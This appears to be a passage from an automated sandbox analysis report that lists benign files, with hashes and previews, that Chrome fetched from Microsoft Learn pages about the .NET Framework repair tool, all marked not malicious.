                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):13339
                                                                                                                                                                      Entropy (8bit):7.683569563478597
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:zjSKAj04ndWb6OuzZjk6TsEaJS0/bJur2Gz4Imm3MhE4NfM:zutfW69XTspsG3G0TfhEQM
                                                                                                                                                                      MD5:512625CF8F40021445D74253DC7C28C0
                                                                                                                                                                      SHA1:F6B27CE0F7D4E48E34FDDCA8A96337F07CFFE730
                                                                                                                                                                      SHA-256:1D4DCEE8511D5371FEC911660D6049782E12901C662B409A5C675772E9B87369
                                                                                                                                                                      SHA-512:AE02319D03884D758A86C286B6F593BDFFD067885D56D82EEB8215FDCB41637C7BB9109039E7FBC93AD246D030C368FB285B3161976ED485ABC5A8DF6DF9A38C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..3.IDATx^..].5Y...C.$..tH .NF.I&A0..;.r.fF.#..!7...'..3.0.../..s....."!.y...~....4....om.g.3.BTP......j..g.zVU....u...a.Z..j..U....y......$.....I...pAR...\.T....$.....I...pAR...\.T..p....5O>.d...}Rg.$....@.4....fb1.o.I...7..<.P.....n0.D.P.....n..L.P.....n8.......P.~......n(+..'. ......J.vM,H*......W...h.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$.....I...pAR...\.T....$......'....w....g....|../5_.......T...~.y.'.'.|...W..[...C.)......|.[.[WK...w...w..y.{..|.#.n>...5....5...h>..O6O>.Xx....o.B........g?.........~....?o...w.......}..-_k^........l....|.D.TH.....o..B'..(.W-%...?...W.......E?h..........~.......?...~,..}...o^...5ox..bI.mo{[s.}.5.<.L.......<......Y.W......K..Q._...Iu...2...e)d]4.}Y..............k.%k..s.'..L(..o4...g...z*............N.X.....W.O.^.4.....7......i~._7..~,bI......3.0RRq..|.Mk..?.{.K_...t.........SYG.W^#).N^..._W...(.8.7.....W....7...m
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):18367
                                                                                                                                                                      Entropy (8bit):7.7772261735974215
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:4qqZYz7CAda2Qmd6VWWNg9h8XvdkRbdi2nki:1qZYz7Cma2hYNMh8XvdObdi2nX
                                                                                                                                                                      MD5:240C4CC15D9FD65405BB642AB81BE615
                                                                                                                                                                      SHA1:5A66783FE5DD932082F40811AE0769526874BFD3
                                                                                                                                                                      SHA-256:030272CE6BA1BECA700EC83FDED9DBDC89296FBDE0633A7F5943EF5831876C07
                                                                                                                                                                      SHA-512:267FE31BC25944DD7B6071C2C2C271CCC188AE1F6A0D7E587DCF9198B81598DA6B058D1B413F228DF0CB37C8304329E808089388359651E81B5F3DEC566D0EE0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-no-resolution.png
                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..GTIDATx^._.}.U.7..BkB.......!E......b.Ej.K...Z...iK.$..h..B`..T.?5.7.I..16$.E.......c...c...Q_V.k...k..g.y.9..G.g..g.9.Z{..Z{.nv....@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...<@v.].../.1R'm.....x..h.....]a1U7........s.......x.h.q.A! *....8IL\GP..............M...W.............D.....dJ<.+,.........W...pgAT...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.D....T.Q....U@T...@......P.;/*..G....O~..O~...'?......h.....}.y..4/....S..........Y......?..?.g7...G...............x{..w..y.~.9.~.y....y.#.c....<.E.............^..7G.._.u.nv/..f........5.....5?.;...w.....i~.?|..H+*Dd.....Y%*....r~.$Q...7.v..._hv..r.O_.4..7M.6....o..=..?....3....?.....xE...O..7....^......D.W....m...6........O..Ob.4.9J........6.;..>.,.....o.l..>%J.V......%k..0.bQqIA..O..y.{.....7.......4_..Za...4.o.....h..........k...M...i....G.4...h.L.#...&.'%...~j..W.*Kx......o.%s.m
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1154
                                                                                                                                                                      Entropy (8bit):4.59126408969148
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:txFRuJpzYeGK+VS6ckNL2091JP/UcHc8oQJ1sUWMLc/jH6GbKqjHJIOHA:JsfcU6ckNL2091Z/U/YsUDM+GhS
                                                                                                                                                                      MD5:37258A983459AE1C2E4F1E551665F388
                                                                                                                                                                      SHA1:603A4E9115E613CC827206CF792C62AEB606C941
                                                                                                                                                                      SHA-256:8E34F3807B4BF495D8954E7229681DA8D0DD101DD6DDC2AD7F90CD2983802B44
                                                                                                                                                                      SHA-512:184CB63EF510143B0AF013F506411C917D68BB63F2CFA47EA2A42688FD4F55F3B820AF94F87083C24F48AACEE6A692199E185FC5C5CFBED5D70790454EED7F5C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<svg width="456" height="456" viewBox="0 0 456 456" fill="none" xmlns="http://www.w3.org/2000/svg">..<rect width="456" height="456" fill="#512BD4"/>..<path d="M81.2738 291.333C78.0496 291.333 75.309 290.259 73.052 288.11C70.795 285.906 69.6665 283.289 69.6665 280.259C69.6665 277.173 70.795 274.529 73.052 272.325C75.309 270.121 78.0496 269.019 81.2738 269.019C84.5518 269.019 87.3193 270.121 89.5763 272.325C91.887 274.529 93.0424 277.173 93.0424 280.259C93.0424 283.289 91.887 285.906 89.5763 288.11C87.3193 290.259 84.5518 291.333 81.2738 291.333Z" fill="white"/>..<path d="M210.167 289.515H189.209L133.994 202.406C132.597 200.202 131.441 197.915 130.528 195.546H130.044C130.474 198.081 130.689 203.508 130.689 211.827V289.515H112.149V171H134.477L187.839 256.043C190.096 259.57 191.547 261.994 192.192 263.316H192.514C191.977 260.176 191.708 254.859 191.708 247.365V171H210.167V289.515Z" fill="white"/>..<path d="M300.449 289.515H235.561V171H297.87V187.695H254.746V221.249H294.485V237.861H254.746V
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3130
                                                                                                                                                                      Entropy (8bit):4.790069981348324
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:YWuGl640ynAqgDJ9OJWuO6Z3Db8VgK/ni47ttbtlSlA37ERw7II77Aj5M1:Nv0ynAhD3CO5t5lNEYIOEjc
                                                                                                                                                                      MD5:EBA6E81304F2F555E1D2EA3126A18A41
                                                                                                                                                                      SHA1:61429C3FE837FD4DD68E7B26678F131F2E00070D
                                                                                                                                                                      SHA-256:F309CCCE17B2B4706E7110F6C76F81761F0A44168D12C358AC4D120776907F81
                                                                                                                                                                      SHA-512:3BE0466794E7BDDC8565758DBF5553E89ED0003271F07695F09283F242BB65C1978ED79A38D5E589A99F68C0130E1E4B52576D7CD655EE272EE104BE0378E72E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"items":[{"children":[{"children":[{"homepage":"/dotnet/api/index","href":"/dotnet/api/","toc_title":"API browser"},{"homepage":"/dotnet/csharp/index","href":"/dotnet/csharp/","toc_title":"C#"},{"homepage":"/dotnet/fsharp/index","href":"/dotnet/fsharp/","toc_title":"F#"},{"homepage":"/dotnet/visual-basic/index","href":"/dotnet/visual-basic/","toc_title":"Visual Basic"},{"homepage":"/dotnet/ai/index","href":"/dotnet/ai/","toc_title":"AI"},{"homepage":"/dotnet/azure/index","href":"/dotnet/azure/","toc_title":"Azure"},{"homepage":"/dotnet/aspire/index","href":"/dotnet/aspire/","toc_title":".NET Aspire"},{"homepage":"/dotnet/orleans/index","href":"/dotnet/orleans/","toc_title":"Orleans"},{"children":[{"homepage":"/dotnet/framework/unmanaged-api/","href":"/dotnet/framework/unmanaged-api/","toc_title":"Unmanaged API reference"}],"homepage":"/dotnet/framework/index","href":"/dotnet/framework/","toc_title":".NET Framework"},{"children":[{"homepage":"/dotnet/architecture/modern-web-apps-azure/
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):15427
                                                                                                                                                                      Entropy (8bit):7.784472070227724
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                      MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                      SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                      SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                      SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):464328
                                                                                                                                                                      Entropy (8bit):5.074669864961383
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:XegPryKCerH5dyUJ6Yh6BFPDxZYX04GK7M4:gKCerXyUh
                                                                                                                                                                      MD5:CB0701D474D57F8C8E2F569161CE0349
                                                                                                                                                                      SHA1:4BE2E0C148DED16354E7A91FE721644897C5503C
                                                                                                                                                                      SHA-256:AD52B36EA7D484522BA3382718BD370E6804F7B46AD3BE821D94AF81D66F40EB
                                                                                                                                                                      SHA-512:BB54B08F64F85498D6592C614F844842CD87BA5A9127B1D2B8AFAEC8086DE171642EA2D241708C9D06DEFDDFA04A4189AAD4814AFD15303C6481F23793CD2D3F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/static/assets/0.4.028726178/styles/site-ltr.css
                                                                                                                                                                      Preview:.CodeMirror{height:300px;color:#000;direction:ltr;font-family:monospace}.CodeMirror-lines{padding:4px 0}.CodeMirror pre.CodeMirror-line,.CodeMirror pre.CodeMirror-line-like{padding:0 4px}.CodeMirror-scrollbar-filler,.CodeMirror-gutter-filler{background-color:#fff}.CodeMirror-gutters{white-space:nowrap;background-color:#f7f7f7;border-right:1px solid #ddd}.CodeMirror-linenumber{min-width:20px;text-align:right;color:#999;white-space:nowrap;padding:0 3px 0 5px}.CodeMirror-guttermarker{color:#000}.CodeMirror-guttermarker-subtle{color:#999}.CodeMirror-cursor{width:0;border-left:1px solid #000;border-right:none}.CodeMirror div.CodeMirror-secondarycursor{border-left:1px solid silver}.cm-fat-cursor .CodeMirror-cursor{width:auto;background:#7e7;border:0!important}.cm-fat-cursor div.CodeMirror-cursors{z-index:1}.cm-fat-cursor .CodeMirror-line::selection,.cm-fat-cursor .CodeMirror-line>span::selection,.cm-fat-cursor .CodeMirror-line>span>span::selection{background:0 0}.cm-fat-cursor{caret-color:#0
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):18477
                                                                                                                                                                      Entropy (8bit):5.147347768532056
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                      MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                      SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                      SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                      SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (65410)
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):195719
                                                                                                                                                                      Entropy (8bit):5.430057012529021
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:Wx2fZBMb0y0Xi13tL9+pjXDMe/m7GG3/lHNVli2:Wof3G0NSkNzMeO7z/l3lh
                                                                                                                                                                      MD5:9445D8D43537540BC89651C93A9C3832
                                                                                                                                                                      SHA1:EC3066770D52DB58CB7E44C54C3ABAA40CEB121A
                                                                                                                                                                      SHA-256:586D6261C80CBF8CDEC59DE01F1A1D09B32C04E87431E4333A0BF4D8990C2755
                                                                                                                                                                      SHA-512:F2BB9BB14C24883499AF2FAD35EE95AF7BF3D9B0431D8072C54C9D5946C751E04D952F5AD5D937F6CBC7C56177FA2091A5A6F33318F2907E9D3628C28E7FFC9C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://js.monitor.azure.com/scripts/c/ms.jsll-4.min.js
                                                                                                                                                                      Preview:/*!. * 1DS JSLL SKU, 4.3.3. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var r,i,e=typeof globalThis!=n?globalThis:e||self,a={},o="__ms$mod__",c={},u=c.es5_ms_jsll_4_3_3={},s="4.3.3",l="oneDS4",f=(f=e)[l]=f[l]||{},d=(d=e)[l="oneDS"]=d[l]||{},e=f[o]=f[o]||{},p=e.v=e.v||[],l=d[o]=d[o]||{},g=l.v=l.v||[];for(i in(l.o=l.o||[]).push(c),t(a),a)r="x",f[i]=a[i],p[i]=s,typeof d[i]==n?(r="n",(d[i]=a[i])&&(g[i]=s)):g[i]||(g[i]="---"),(u[r]=u[r]||[]).push(i)}}(this,function(f){"use strict";var d="function",p="object",se="undefined",ie="prototype",g=Object,h=g[ie];function y(e,t){return e||t}var C,Ce=undefined,m=null,b="",T="function",I="object",E="prototype",_="__proto__",S="undefined",x="constructor",N="Symbol",D="_polyfill",A="length",w="name",be="call",k="toString",P=y(Object),O=P[E]
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):18477
                                                                                                                                                                      Entropy (8bit):5.147347768532056
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:cF3MGvRvqhjNLN1RlX+Vqn3wj2pC33qr3h3x7Z04519u2/8Xx7kuFg/F3Bo3h16z:63MGpvqhj/rlOVqnACpK3o3hhl0OU2/x
                                                                                                                                                                      MD5:9A6B01877BAAC986FE1FBF4CAA95E7C7
                                                                                                                                                                      SHA1:A3227894EACEB2177EEE7CF66A693A9B4C0971FE
                                                                                                                                                                      SHA-256:12051CF7967A2E3F39971EC7F48D1892EB7138F7D1F7E5A3407D63E257EBE7AC
                                                                                                                                                                      SHA-512:5DBDA31E67FE480385283A63F8C2D0CE5E1B2A04A23917F65F0EC6867A9D95C93E4B50807D42D65718EF01588AA523FE791A0A1BD0663BB5DC9BED5E43995AB2
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/banners/index.json
                                                                                                                                                                      Preview:{"banners":[{"content":{"text":"You may experience reduced functionality with empty pages and broken links. Development is in progress to improve your experience."},"dismissable":false,"location":"sectional","scope":{"accessLevels":["isolated"],"endDate":"2030-01-01T00:00:00-00:00","paths":["/samples/browse/","/lifecycle/products/","/dotnet/api/","/javascript/api/","/java/api/","/powershell/module/","/python/api/","/rest/api/","/assessments/"],"startDate":"2020-10-01T05:00:00-04:00"},"uid":"development-in-progress-isolated"},{"content":{"link":{"href":"/en-us/answers/questions/1657059/the-subscription-is-not-allowed-to-create-or-updat","title":"View discussion"},"text":"App Service deployment: subscription \u0027xxxxxxxx\u0027 is not allowed to create or update the server farm."},"dismissable":true,"location":"sectional","scope":{"accessLevels":["online"],"endDate":"2024-05-24T07:34:00.000Z","paths":["/answers/tags/436/azure-app-service"],"startDate":"2024-04-22T07:34:00.000Z"},"uid":"
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):15427
                                                                                                                                                                      Entropy (8bit):7.784472070227724
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:CKKdvwj3SJMpKKKKKKKKikCyKwqHILyPGQV4ykihKKKKKKKCm:CKKdvMMgKKKKKKKKiqB3yPVXkihKKKKI
                                                                                                                                                                      MD5:3062488F9D119C0D79448BE06ED140D8
                                                                                                                                                                      SHA1:8A148951C894FC9E968D3E46589A2E978267650E
                                                                                                                                                                      SHA-256:C47A383DE6DD60149B37DD24825D42D83CB48BE0ED094E3FC3B228D0A7BB9332
                                                                                                                                                                      SHA-512:00BBA6BCBFBF44B977129594A47F732809DCE7D4E2D22D050338E4EEA91FCC02A9B333C45EEB4C9024DF076CBDA0B46B621BF48309C0D037D19BBEAE0367F5ED
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/en-us/dotnet/framework/install/media/application-not-started/repair-tool-recommended-changes.png
                                                                                                                                                                      Preview:.PNG........IHDR.............,#......sRGB.........gAMA......a.....pHYs..........o.d..;.IDATx^..].u.Y..M....B.X...".......@.ZzSys..,H{.Rz!... .......WM.IN..9n..I....g...p<P.0*-....|...X..s...Z.Y{....w..5.._s..x...E.......... ......*............... ......*............{....2. ...`.$h.......)....,T-x.5......,.."..(.A.......>.. ...`..*....4..G.|.....,T-..'. ...`....]........?~.....A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.T..........A...pAP...\.}P../}....TJ...'.O...'?......XH...K..>.b..K/t...o.......T.._.E.....q.$.x..qJ......mo...ww.}.{....W..._...._.^z...........(^x..C..P.../.........U..]../u.....w..{.O.N..o.l........_.^...2.....*....<...iP.W...o......]..+.?}c...t!.....p.=..._x..._yo....?....~u.c?.c1'.....{.^.}.S...5.yMx./.>.lwqq.}.....g..g1wZ..%......h.i[..%ul.&..U.k..";7-.9.6...s..s..0.......}.s..?...c..X...|..........>.x..o.?.?..{........n..o....]?....Ej..yuu5...A.}....5...^...f........s.qJ..SYF.V...'..q.......T..'..z.....
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):52717
                                                                                                                                                                      Entropy (8bit):5.462668685745912
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                      MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                      SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                      SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                      SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):1432
                                                                                                                                                                      Entropy (8bit):4.986131881931089
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:TGAcSRrEV4YUmjiqIWD5bfD9yRSmkYR/stZLKvVqXRRlAfr6VXBAuU:Ti4IV4YUmjiqr9bfskAmZTXGfSXqh
                                                                                                                                                                      MD5:6B8763B76F400DC480450FD69072F215
                                                                                                                                                                      SHA1:6932907906AFCF8EAFA22154D8478106521BC9EE
                                                                                                                                                                      SHA-256:3FB84D357F0C9A66100570EDD62A04D0574C45E8A5209A3E6870FF22AF839DFC
                                                                                                                                                                      SHA-512:8A07EBB806A0BA8EF54B463BD6AF37C77A10C1FA38A57128FD90FCB2C16DF71CE697D4FE65C623E5C6054C5715975831C36861D5574F59DF28836D9BC2B0BC22
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://learn.microsoft.com/static/assets/0.4.028726178/global/deprecation.js
                                                                                                                                                                      Preview:// ES5 script for back compat with unsupported browsers..!(function () {..'use strict';..// Keep in sync with environment/browser.ts..var supportedBrowser =...typeof Blob === 'function' &&...typeof PerformanceObserver === 'function' &&...typeof Intl === 'object' &&...typeof MutationObserver === 'function' &&...typeof URLSearchParams === 'function' &&...typeof WebSocket === 'function' &&...typeof IntersectionObserver === 'function' &&...typeof queueMicrotask === 'function' &&...typeof TextEncoder === 'function' &&...typeof TextDecoder === 'function' &&...typeof customElements === 'object' &&...typeof HTMLDetailsElement === 'function' &&...typeof AbortController === 'function' &&...typeof AbortSignal === 'function' &&...'entries' in FormData.prototype &&...'toggleAttribute' in Element.prototype &&...'replaceChildren' in Element.prototype &&...// ES2019...'fromEntries' in Object &&...'flatMap' in Array.prototype &&...'trimEnd' in String.prototype &&...// ES2020...'allSettled' in Promise &
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):52717
                                                                                                                                                                      Entropy (8bit):5.462668685745912
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:1536:tjspYRrxlhd0fq3agV3IcgPPPI3r7DAQHCloIB3Tj7xHw:tjZLCtxQ
                                                                                                                                                                      MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                                      SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                                      SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                                      SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      URL:https://wcpstatic.microsoft.com/mscc/lib/v2/wcp-consent.js
                                                                                                                                                                      Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:exported SGML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                      Category:downloaded
                                                                                                                                                                      Size (bytes):1173007
                                                                                                                                                                      Entropy (8bit):5.503893944397598
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:VMga+4IVzOjS1Jho1WXQFjTEr39/jHXzT:VMcVzOjS1Jho1WXQar39/bXzT
                                                                                                                                                                      MD5:2E00D51C98DBB338E81054F240E1DEB2
                                                                                                                                                                      SHA1:D33BAC6B041064AE4330DCC2D958EBE4C28EBE58
                                                                                                                                                                      SHA-256:300480069078B5892D2363A2B65E2DFBBF30FE5C80F83EDBFECF4610FD093862
